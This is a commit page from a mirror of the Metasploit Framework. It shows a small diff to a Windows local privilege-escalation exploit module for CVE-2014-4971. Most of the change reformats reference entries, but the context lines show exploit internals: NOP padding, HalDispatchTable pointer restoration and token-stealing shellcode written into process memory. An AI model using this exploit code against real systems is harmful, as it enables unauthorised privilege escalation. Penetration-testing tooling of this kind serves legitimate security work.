infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Solve conflicts

bug/bundler_fix
jvazquez-r7 2014-08-28 10:19:12 -05:00
parent 6d45f75b47 f3e8c51573
commit 9d3d25a3b3
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/windows/local/mqac_write.rb
View File

@ -51,9 +51,9 @@ class Metasploit3 < Msf::Exploit::Local
], ],
'References' => 'References' =>
[ [
%w(CVE 2014-4971), ['CVE', '2014-4971'],
%w(EDB 34112), ['EDB', '34112'],
%w(URL https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt) ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
], ],
'DisclosureDate' => 'Jul 22 2014', 'DisclosureDate' => 'Jul 22 2014',
'DefaultTarget' => 0 'DefaultTarget' => 0
@ -150,6 +150,7 @@ class Metasploit3 < Msf::Exploit::Local
restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target) shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)
this_proc.memory.write(0x1, shellcode) this_proc.memory.write(0x1, shellcode)
this_proc.close this_proc.close